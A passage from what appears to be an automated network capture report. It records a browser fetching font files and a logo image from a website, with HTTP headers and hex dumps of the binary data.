                                                        2025-03-15 00:17:58 UTC434INData Raw: 77 4f 46 32 00 01 00 00 00 00 1e dc 00 0c 00 00 00 00 3f a0 00 00 1e 8a 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 20 1c 30 06 60 00 81 54 0a e7 4c d2 36 0b 83 36 00 01 36 02 24 03 86 68 04 20 05 83 5c 07 84 0b 1b 82 32 b3 22 d8 38 00 20 a1 77 15 45 a5 22 ca fe ab 04 6e 0e 70 1d 4d 24 44 44 78 55 55 d5 ae 6f a9 13 30 1c 23 31 b9 67 cf 3f 5f 0c 70 02 80 21 b0 2f 54 ac ba da 0e d9 58 86 9f 78 4c 57 a4 73 d2 11 1a fb 24 97 e7 e9 f7 e3 7f 6b ef 73 bf 5b d3 f4 e7 57 6b 22 16 0d 88 3e 5d 2b 15 af 0c 91 08 d9 33 59 2c 24 f1 f8 ce f0 fc 36 7b 8a 33 36 17 a9 3d 8c a2 4a a2 3f f1 81 0f 48 e4 27 04 13 2b 58 39 73 11 ed a2 dc 76 ba bb f3 76 b2 c8 ba a8 ed 7a d9 fe 97 ae ec b7 7a c6 f0 5e cb 1b e4 0e 22 8a 22 68 18 d6 b2 d6 96 81 17 50
                                                        Data Ascii: wOF2? 0`TL666$h \2"8 wE"npM$DDxUUo0#1g?_p!/TXxLWs$ks[Wk">]+3Y,$6{36=J?H'+X9svvzz^""hP
                                                        2025-03-15 00:17:58 UTC1369INData Raw: ae 24 48 03 a9 56 f0 f1 68 a2 45 2f c3 94 45 06 01 7d ab 76 c0 35 bf 5b 1e a1 05 7e 1d be ca 19 d7 58 3c 47 57 ee 2b f4 e0 28 70 70 57 44 e2 ca 66 c5 4b 6d 1b f7 03 f0 36 40 0f 77 3f 60 bf 08 40 01 03 b0 13 46 18 0b 44 c8 d4 39 2a 7a 2c 63 01 9b b4 fa 12 6a 4c 3d d8 d3 bd df 1f f7 8f c1 26 62 53 b1 e9 d8 6c 2c 17 2b c3 ee 39 90 9e 3e 2a 7d ac ca 40 1c 89 b5 b1 bf 71 87 d1 d8 78 6c b2 94 f3 b3 6a e6 ab f9 c7 3c 3e 17 cf fa 95 98 cf 3e fd f6 e9 ff 5f f7 fd fa ed af df fc da f7 eb 9e 5f d7 fc ba f8 57 dc 2f df fd 7c fa e7 93 20 cc 62 e0 0f d6 55 3e 05 fc 05 6c fa 16 d8 f1 21 30 b6 03 f9 d7 98 d1 3e 1f 11 c6 20 e1 c2 40 31 04 35 cf c2 d7 59 8c f0 b9 78 53 aa 9c 3b 8c cb b1 88 5f ce 17 5b b7 25 61 d4 13 26 29 82 72 61 6a 00 07 c5 dd 0b 77 30 20 1a 19 01 73 c6
                                                        Data Ascii: $HVhE/E}v5[~X<GW+(ppWDfKm6@w?`@FD9*z,cjL=&bSl,+9>*}@qxlj<>>__W/| bU>l!0> @15YxS;_[%a&)rajw0 s
                                                        2025-03-15 00:17:58 UTC1369INData Raw: e9 b0 7e d0 36 1f 10 b3 79 7f 34 05 91 e2 6d e3 c2 01 f5 8b 37 16 c8 82 5b 81 f8 9b b0 a3 a0 6d 83 8a bc 96 a2 f6 65 cc 93 db 8a 5b b7 b9 cc 6d 2f 6c d9 85 4d cc 0d 2a 1e 60 4d 73 4a b1 5b 80 82 87 c6 36 d5 e1 5a 1d b0 48 ad dd 24 f9 b9 4e 36 f4 7d 9c a4 0d 96 9d ba 8b ec 78 db 48 55 62 c9 ae 6d 2d 45 fd be 65 82 e1 3c e6 0b b8 d6 39 30 4b e5 bb 6f e4 55 eb 01 f7 30 6b c3 b2 7c 6e e8 00 5a 20 13 bd 0d 64 9c 0e 55 f6 8e 55 8c a0 6e e0 2e ee 69 a3 01 9f 18 51 ea 2a a1 8c d2 53 7c 06 cd ba 0d 16 23 64 85 77 1e ea ca 1c cb 41 cc 07 2a 96 61 b9 9f 89 61 cf c4 8d 3c 9a 0a 73 3a 67 10 21 49 9d 59 86 67 8e 31 9f a7 62 d6 87 6e e7 49 1e 34 58 ee b6 9d 08 b8 77 77 3a 91 09 e3 8d 9b 43 7e 1b f3 ad e2 d0 b7 e9 3b 12 ab c2 6c fb 81 81 a5 16 73 66 04 55 44 99 76 9f d2
                                                        Data Ascii: ~6y4m7[me[m/lM*`MsJ[6ZH$N6}xHUbm-Ee<90KoU0k|nZ dUUn.iQ*S|#dwA*aa<s:g!IYg1bnI4Xww:C~;lsfUDv
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 65 3a b4 62 08 55 68 c0 c1 59 b0 40 68 d2 75 84 ad 46 7c 34 3e 54 ce e2 05 34 95 53 3a 1b e6 d5 7d d7 df 4a d8 52 61 71 97 d6 57 47 99 cd 57 16 5b 8c 4a 8d 09 45 14 46 1b ac 32 d8 74 40 36 f3 e9 c3 5f 1e 1c 79 f6 e0 d7 87 52 f5 45 eb b5 51 b7 87 38 70 1b b3 e4 48 f7 9d f0 1d 9b 54 eb 09 74 14 d7 86 7b f4 98 f5 29 45 b5 3c 13 5f 29 17 08 15 52 ae 95 cf 74 fa a9 12 fb 99 a9 ef c3 fa da b7 98 6c 2b 8a f4 f4 45 7e 87 94 66 e0 fe eb a1 32 11 ab 4b af 11 76 d4 ea 94 5e ac f2 2b 3d 15 9b 3e 82 cf cc e5 6a 52 1a d8 5d eb 16 2e 9c 70 b8 a1 f2 cc 24 d0 d5 bd 60 81 47 99 76 c8 9e 59 59 b9 b9 c0 be a2 78 7e c7 df 7f 4e 5f 24 13 6b 18 78 27 8b c1 16 33 28 30 3b c7 45 63 ba e9 e0 ef 35 94 fc 35 85 1f fa 03 ef fb 0b 0d 0f a6 7a a7 7a c1 95 c2 df 32 55 38 26 d3 5c 4a 51
                                                        Data Ascii: e:bUhY@huF|4>T4S:}JRaqWGW[JEF2t@6_yREQ8pHTt{)E<_)Rtl+E~f2Kv^+=>jR].p$`GvYYx~N_$kx'3(0;Ec55zz2U8&\JQ
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 4c 1c 55 8e e6 f2 d0 5a 14 a3 47 71 7f 30 a9 ab d3 93 d2 65 ff f7 a9 52 b5 61 44 aa d2 99 cb 03 07 ee 42 b9 23 70 90 d6 88 68 e4 05 90 52 a3 9c 83 ce 59 a8 01 b4 8c 4c d4 b0 da 45 62 8b 4b 18 dc 00 22 71 32 0d 06 ab 52 65 72 58 89 20 de d4 73 c5 77 3b a3 62 b3 f1 03 5a 43 e6 ae 0c 4f d7 37 e6 7f 83 9e dd 19 ee a9 17 66 5e 70 4f bb 38 e5 22 a8 ec b8 d0 72 c1 bb 77 f8 de d1 65 1d e7 a7 9c f7 f6 0d db 3b 06 64 66 8c d9 92 ed a9 8c fa 31 a5 64 f7 81 9e 03 60 91 7a a8 a6 59 13 b3 20 5a 5d af 06 e5 ab 4a 46 59 b3 63 d0 18 1f 01 2e d0 c8 b8 fa bc 1c 63 6e 4a 94 79 58 4c 42 60 32 14 95 e1 95 0c 25 93 10 e3 1d 16 65 53 72 8d 39 79 7a ae ac 40 03 13 62 7c 31 68 b6 b5 64 14 38 1c 40 a7 a3 e0 b3 50 de a1 dc bb 8a fb aa 04 c2 d9 8d 49 9b 37 b5 3e 1a 99 28 15 c8 e2 17
                                                        Data Ascii: LUZGq0eRaDB#phRYLEbK"q2RerX sw;bZCO7f^pO8"rwe;df1d`zY Z]JFYc.cnJyXLB`2%eSr9yz@b|1hd8@PI7>(
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 52 a2 a8 9e 83 34 c9 44 41 d8 2d 26 21 05 b9 54 b8 1c 8d d4 b5 f4 d1 d5 b0 bc f0 2a 19 03 f5 90 ed 74 43 46 6b 9b fc b6 48 da 14 dc 39 95 b2 c8 00 cc 9d ac b7 58 5e bf 9b c0 f4 fe e8 6e e5 a2 56 95 41 df a2 90 75 5a 4c f2 d6 49 72 64 82 00 1d ef 91 21 1d 78 9a 7b fc e7 76 77 83 a5 13 4f 77 8f 47 f5 66 32 cd 2d 91 50 dd 26 12 8d 66 24 51 9c 12 29 d9 63 a0 d0 00 23 6a 46 5d fb c7 06 ed 67 ed 9f 9c 5c 6f 30 f2 c6 cb 74 1f d7 a6 98 95 4f c5 5a 2f 51 ea 5e a5 fb 79 ee c6 2c 4b 54 ec 3e c9 75 77 66 4c c6 5b 85 8d 11 a9 45 b0 5f f1 87 52 aa eb 71 1d e0 d8 5f 15 32 d8 d1 f8 3c c1 01 45 4f 0b fa 37 ca 68 74 7b e1 1d 19 36 d5 32 3f e8 fc a4 fc f4 d2 1f 0e 2e cc 56 ce d2 da 3d eb 9c e8 e6 d2 32 74 93 2c c6 6d 9f ad c9 56 cc 0d 2a 93 5c a5 d2 29 5f 16 46 4c 31 1a f5
                                                        Data Ascii: R4DA-&!T*tCFkH9X^nVAuZLIrd!x{vwOwGf2-P&f$Q)c#jF]g\o0tOZ/Q^y,KT>uwfL[E_Rq_2<EO7ht{62?.V=2t,mV*\)_FL1
                                                        2025-03-15 00:17:58 UTC621INData Raw: 0c 53 b1 a5 d7 a2 06 ce a7 1d af 7a 4b 8c 09 b8 c8 b6 4b 99 d0 0c 33 58 19 00 cc 95 6b 0f be ce 8e 93 0f 58 54 98 97 a9 02 bf eb 54 2b bc 09 f8 2c be 98 6e a8 08 12 18 cc 00 e6 02 1f 9b 71 d9 84 f0 0b 1b de 0f b0 c9 37 d2 0b c3 e3 40 c5 6e 83 8c 66 88 1f c4 f3 ae b1 f6 cf cf 69 11 8f ee 81 f1 54 5a c7 54 39 42 e2 11 b1 60 5a 1e 8b 19 78 09 63 28 48 68 0e e4 b8 78 01 84 01 7e b0 5c ac a0 48 61 c2 a5 8a 04 3c 07 18 c2 01 6b 95 c2 08 5b 62 00 f0 11 c0 76 0a 33 cc 66 31 dc bd 77 27 0c be c3 3b 45 48 f5 7e a7 41 06 27 7e a7 48 a9 49 bf 6f c3 b0 22 06 a9 55 67 92 06 01 65 ca 35 c1 a2 a1 b0 28 96 39 10 4b 68 01 81 d4 d5 f1 1a 8d 69 d2 a0 49 45 9a 16 91 a3 12 cd 42 ca 43 da 20 a2 b9 8d 2c ac 49 9d 46 5c 64 64 65 02 af 33 6f e6 47 52 a4 56 35 32 27 a5 34 71 b3 1a
                                                        Data Ascii: SzKK3XkXTT+,nq7@nfiTZT9B`Zxc(Hhx~\Ha<k[bv3f1w';EH~A'~HIo"Uge5(9KhiIEBC ,IF\dde3oGRV52'4q


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.549775104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:58 UTC679OUTGET /static/fonts/pxibyp8kv8jhgfvrlgt9z1xlfq.woff2 HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        Origin: https://www.36fg.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://www.36fg.com/static/css/b6f99a7fe7b04da897d26b4ff96c2310.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:58 UTC938INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:58 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 7776
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:38 GMT
                                                        etag: "60e7ae7a-1e60"
                                                        strict-transport-security: max-age=31536000
                                                        Cache-Control: max-age=14400
                                                        CF-Cache-Status: REVALIDATED
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EU%2BqOK8XtYQ7dEo5EUMabutZ8AxmYxFDom6VeBSejrOjHFN7POiLwFMEfV%2F7wEdJL10cah%2BOTARGTAaEsHFd%2BtmzXZYMBKFzhg%2FFKDPUbZbD3V9uekqwYa0dH6hasFQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4b3398660e6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=2016&rtt_var=800&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1251&delivery_rate=1332116&cwnd=214&unsent_bytes=0&cid=09accdbe3cab13a2&ts=352&x=0"
                                                        2025-03-15 00:17:58 UTC431INData Raw: 77 4f 46 32 00 01 00 00 00 00 1e 60 00 0c 00 00 00 00 3f 70 00 00 1e 0c 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 20 1c 30 06 60 00 81 54 0a e7 30 d2 04 0b 83 36 00 01 36 02 24 03 86 68 04 20 05 83 48 07 84 0b 1b 3c 32 a3 a2 86 b4 5a 94 a2 28 57 94 26 f8 cb 04 6e 0e 70 1d 2b 91 30 12 22 21 02 86 95 1a 01 63 d9 b5 bb 82 bb f8 43 25 a2 af 1a c2 3f 46 7a 42 65 d0 d1 1a 5e 71 50 99 1e a1 b1 4f 72 79 1e 7e 7f 50 e7 de f7 07 4a b3 80 bb a8 b4 21 6f b2 2a 5c 21 54 86 22 c7 9d 37 3c bf cd ff a3 3d d7 46 4f 99 01 06 25 25 12 c2 a5 5a aa 8d c2 00 2e 82 39 d4 45 b5 73 d5 7f 93 d5 6b fb 2d 5f e4 5e fb f6 16 fd 22 dd bf 5c cb 5d 9b cc fb 12 93 0c 68 57 54 c8 ee 1e 80 73 d7 72 5c 51 d6 ff ca 69 fd 56 b7 e9 fd 56 e2 81 25 80 cb 61 a0 41
                                                        Data Ascii: wOF2`?p 0`T066$h H<2Z(W&np+0"!cC%?FzBe^qPOry~PJ!o*\!T"7<=FO%%Z.9Esk-_^"\]hWTsr\QiVV%aA
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 59 2f 54 a9 67 63 b1 ec 65 5c 9c df 44 01 bd bd 46 c0 c9 7a 8f 5c 86 10 c9 9b 61 25 dd 77 15 e5 00 9d 78 8e 40 09 de 05 76 d9 3c 32 7d d3 21 50 b3 b8 eb db 09 80 07 00 ba 67 af 02 76 12 09 28 60 00 36 13 21 ec 46 8c b4 0f da 4f b6 2b 67 01 36 08 fa 7f 4a a2 e9 8d 8e f6 ab de df 29 11 91 8e c8 42 e4 20 90 08 1a 82 87 38 bd 30 27 27 3e 27 29 7f 3c 95 8b 70 30 59 7d 5e 02 22 15 91 e9 5e f6 a7 6a a6 39 98 ef cf 4d 73 9b 6a 6f 4c ff 36 fd f7 fd 90 fe 9f be a8 cf e9 d3 7a b7 de a4 8b be bb fc 3e fa ed 30 08 a3 a4 7e 2f 27 2f 5a fa 5f c0 86 2f 80 8d 37 00 30 36 03 f2 2f 1c 2b 58 7b 37 15 21 4a b8 30 c8 12 9b cf 24 85 f7 6b 22 84 cf 4a 60 7d 3e 04 e8 f7 32 85 5f d2 30 14 1e ad 4d 0a b3 bb 6d 5e 18 b8 d7 e6 04 1a 99 04 5a 6e 79 62 20 cb 8d 14 71 df f0 a9 10 6b 3d
                                                        Data Ascii: Y/Tgce\DFz\a%wx@v<2}!Pgv(`6!FO+g6J)B 80''>')<p0Y}^"^j9MsjoL6z>0~/'/Z_/706/+X{7!J0$k"J`}>2_0Mm^Znyb qk=
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 53 aa da de 76 d7 89 d5 39 4b 30 11 5c d6 09 f4 28 c3 31 06 99 6a 26 5d 6d af 05 70 48 4c 54 97 90 3e f5 6f 05 52 ca 50 f4 98 f7 48 b5 c4 b6 0a fb 95 4c b8 16 b0 cf 8e b9 73 e6 3d 43 3a 63 74 f6 fc 87 30 ef 3e 7b ee f3 b4 3b 1a 9c f3 60 03 21 15 7b 61 ed 1c 6d 32 99 93 89 a9 43 ca a7 fe 76 28 d7 79 f1 06 0e d0 80 e4 81 2f fc a4 a9 31 57 d4 9c 37 a6 98 b3 fe 9c 5f 8f 93 01 37 b9 51 32 7c ad 78 53 36 4c 13 d9 24 c0 b0 b1 cb 22 8d 38 ba b8 8c bd 94 01 0c 46 b1 eb 25 ae 71 d2 07 ce a1 54 29 47 c4 09 f5 23 63 ad 82 03 88 7b a2 bc e4 22 37 f0 5a c8 3c 61 31 fe 7a 8b 2b 08 42 0b a9 c6 6d f4 d6 a3 7f d5 60 e1 80 00 03 bf c6 dc dd c2 7c 93 a0 45 ee e4 24 0d c0 03 89 c5 4d c2 52 21 ff 57 04 a8 29 15 ff bc 07 01 ad 9d b3 12 dc 6c 66 84 0f da de 0d 23 0a 1c 0f 35 d0
                                                        Data Ascii: Sv9K0\(1j&]mpHLT>oRPHLs=C:ct0>{;`!{am2Cv(y/1W7_7Q2|xS6L$"8F%qT)G#c{"7Z<a1z+Bm`|E$MR!W)lf#5
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 3a 93 91 8e da 32 82 a8 bc ac 4c cc 22 0c 8f a9 d9 cc 32 a5 80 cf 53 08 a9 0c 15 c4 01 1f 6f 81 88 54 21 e4 5e e1 d5 e7 11 a1 46 12 a3 41 da da b7 d8 bb 12 be 74 bd bf 68 b0 51 63 6f f2 b9 a3 b5 8d d7 4e f0 24 e5 7c 91 8c c5 12 29 d8 4c 81 42 04 84 cb 7e fe 71 c9 d9 f8 e0 c7 21 60 6d 9c 33 d1 99 f0 e3 de 00 dc d2 8d e6 5f 02 68 7a b7 cb 5d 59 db 5b eb 8a 50 54 47 ee 5d 58 59 47 14 93 3f a4 50 be 24 35 31 c8 b6 1a 22 d7 3e b6 07 fc f7 7c 6b d9 11 8d 7e 7b 8d 8a b2 a9 ce 22 20 ee 6d f8 c5 86 21 ca f5 56 95 ac 7c 89 57 21 34 14 f5 57 97 2c c8 9b 97 2e ce 40 92 25 e9 2d a4 de 2d cb d6 05 ae b9 1b 3f e8 e8 db b1 6c 9d 43 90 33 47 6a 46 7a 5b 06 2b 4c db 6b 36 2c 7d f2 64 e5 36 29 89 87 47 a9 b0 78 19 be 98 4d ca d1 60 71 9f e1 c0 b3 75 b9 25 eb da ff 0a 2d fd
                                                        Data Ascii: :2L"2SoT!^FAthQcoN$|)LB~q!`m3_hz]Y[PTG]XYG?P$51">|k~{" m!V|W!4W,.@%--?lC3GjFz[+Lk6,}d6)GxM`qu%-
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 54 c0 79 16 2c e6 55 66 f2 f4 dd 9b ef c8 10 bd 91 38 a2 d8 5e c8 06 77 26 4a b2 27 73 05 0e b3 bc 42 58 51 02 d9 a0 55 be 55 cb 6d 80 89 44 c1 d0 80 1e 59 02 cd ea 89 3c 2f 71 15 89 20 bb 76 cf bb 9d f7 90 2b ef 22 bb 00 e1 35 ea 24 b2 a3 75 3b 6c 54 c7 29 64 1b 7c ad ed 5a bb fb 8a f7 0a a0 24 5f 48 ee 0f 5c 73 5f 6b bf 30 e7 42 0a b3 0e 80 86 4c ca 2d 0a b8 67 7e b1 a0 77 f7 e0 c1 41 70 ce fa 8f 2d 68 fb a7 f9 5f da 1a 60 d1 c1 df 70 a8 bc 18 47 ac 89 22 54 2b 79 dc 6a 34 e2 29 22 35 4a 09 62 2d 34 22 81 2b 09 97 64 99 48 6b fa 41 8f a6 06 7e be a1 ab b9 3c b5 52 48 89 35 c5 38 f2 50 b8 df c0 b3 07 de 0c 03 1d df d9 6a e9 01 01 aa 50 95 67 0e 5c 58 7f 2b 3e cd c9 d4 cc d1 a8 db 2e 9b 2e d8 a7 e3 d3 eb d4 e0 6d ca 0e c9 b2 77 ce b5 23 7c e1 98 35 d5 09
                                                        Data Ascii: Ty,Uf8^w&J'sBXQUUmDY</q v+"5$u;lT)d|Z$_H\s_k0BL-g~wAp-h_`pG"T+yj4)"5Jb-4"+dHkA~<RH58PjPg\X+>..mw#|5
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 8a a9 48 cb f6 b4 41 c4 9e 02 a6 2a dd 5d 2a 2b c6 6a 19 0c 8c 56 5a 84 46 8b 8b 8a 55 4e 91 4e f4 58 40 ff 6b c7 7a f3 ff ec ce 37 ce 1f 14 86 5e 20 f1 23 8e 0c ae 25 e6 e3 14 10 bb 94 52 35 24 6b ab 33 e6 5b 25 22 ad 51 8e 55 ec 7f 16 39 40 6b 2c 46 88 98 7b 9f 47 05 a9 e8 9a 63 0a f0 c5 6f 55 34 a8 c6 f8 2e 41 95 8c f7 5b e0 c7 70 b6 c2 df 15 df 40 b6 52 ab fa cb ea 97 c6 97 5f cd 31 f5 b9 4f f6 d0 94 b6 fd 66 db a1 ba 3a db 00 2f d8 aa 5c 54 76 dc d5 67 9a 23 97 32 e0 af 06 f9 b0 54 ca f0 2e c5 2b 05 ec f9 d1 d4 23 11 3c 8d 8a 6d ab 21 d1 92 31 fc 16 3a 4a e0 67 f0 97 4b 94 8c 62 18 0f a6 f3 f3 dd 74 61 4d f9 52 3a 95 bb 3f 5c a6 55 52 fe 04 b8 06 15 c4 d4 28 a3 78 60 e7 e0 7a 9d 69 bd 1a 06 99 c0 2f 3b d9 74 3c 0e 53 4a 08 29 38 fc ba 4d 37 c2 9f d7
                                                        Data Ascii: HA*]*+jVZFUNNX@kz7^ #%R5$k3[%"QU9@k,F{GcoU4.A[p@R_1Of:/\Tvg#2T.+#<m!1:JgKbtaMR:?\UR(x`zi/;t<SJ)8M7
                                                        2025-03-15 00:17:58 UTC500INData Raw: 70 4c 61 80 ef 6d 34 8b 5f b4 30 e1 b2 44 03 ae 01 0c e1 80 d5 ea 44 08 5b d6 00 1e 07 28 3f 4c a6 43 f9 e1 e6 78 3b 3f 02 cd 4d 63 a4 34 3f 4a 5c 56 e6 47 cb cc bc 0d 9b 83 12 34 2e 37 8f 4e b0 46 f5 1a b4 41 20 c0 df 84 10 b4 03 4b 2d 53 89 a9 27 55 b6 f2 f1 14 4e d4 15 61 d5 96 21 88 9f 69 c3 88 c1 32 56 e0 11 af d4 23 47 d2 e0 e0 d4 6b 14 ce db af 0a 56 35 b7 16 38 13 ad 53 43 fd 5a d5 80 75 9a 4e cc d8 85 39 b4 c8 d5 aa 91 2d 7e 2d d4 8a d6 7b a8 59 e5 f2 5d 17 d3 12 50 a2 43 58 83 ac 85 04 0b 0f af 21 a9 42 65 f5 ec dd 30 fa 53 c3 cc aa 97 8f 7a 16 ac 72 b1 7c b4 39 c1 62 d0 fa d8 08 25 01 99 70 ca b5 cd 97 10 2c c4 f7 40 9a 21 e2 37 46 ff cb 89 35 43 9c 99 66 99 6d 8e b9 e6 99 2f 5e 82 44 49 92 a5 48 95 26 5d 86 4c 0b 64 c9 86 b0 50 8e 5c 79 f2 21
                                                        Data Ascii: pLam4_0DD[(?LCx;?Mc4?J\VG4.7NFA K-S'UNa!i2V#GkV58SCZuN9-~-{Y]PCX!Be0Szr|9b%p,@!7F5Cfm/^DIH&]LdP\y!


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.549778104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:58 UTC447OUTGET /static/picture/logo-2.png HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:58 UTC978INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:58 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 2706
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:38 GMT
                                                        etag: "60e7ae7a-a92"
                                                        expires: Sun, 13 Apr 2025 11:46:45 GMT
                                                        Cache-Control: max-age=2592000
                                                        strict-transport-security: max-age=31536000
                                                        accept-ranges: bytes
                                                        Age: 45078
                                                        cf-cache-status: HIT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S7DQhC3L5VAfQedNROK4GOesRFZecFh1%2BBAmMEe5s2n8C89OcRISCHH1hjkt%2FsI%2B2wRBqB1AOANcE0Z83HnDVA89GjEkLAIVkFLVKNONUOQqJ80TXMDzCp54W4yFaI4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4b44dccc47a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1669&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1019&delivery_rate=1669525&cwnd=247&unsent_bytes=0&cid=4c8056c40120f7b3&ts=161&x=0"
                                                        2025-03-15 00:17:58 UTC391INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 79 00 00 00 30 08 06 00 00 00 35 ad d5 ed 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 76 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                        Data Ascii: PNGIHDRy05tEXtSoftwareAdobe ImageReadyqe<viTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 6d 2f 78 61 70 2f 31 2e 30 2f 6d 6d 2f 22 20 78 6d 6c 6e 73 3a 73 74 52 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 52 65 66 23 22 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 63 61 61 63 62 34 37 33 2d 62 64 33 35 2d 32 33 34 61 2d 38 38 63 61 2d 31 38 30 34 62 66 33 33 32 31 64 34 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 45 30 44 33 38 31 33 41 46 42 44 46 31 31 45 39 39 34 36 41 45 45 36 41 30 30 41 43 35 36 31 33 22 20 78 6d 70 4d 4d 3a
                                                        Data Ascii: m/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:E0D3813AFBDF11E9946AEE6A00AC5613" xmpMM:
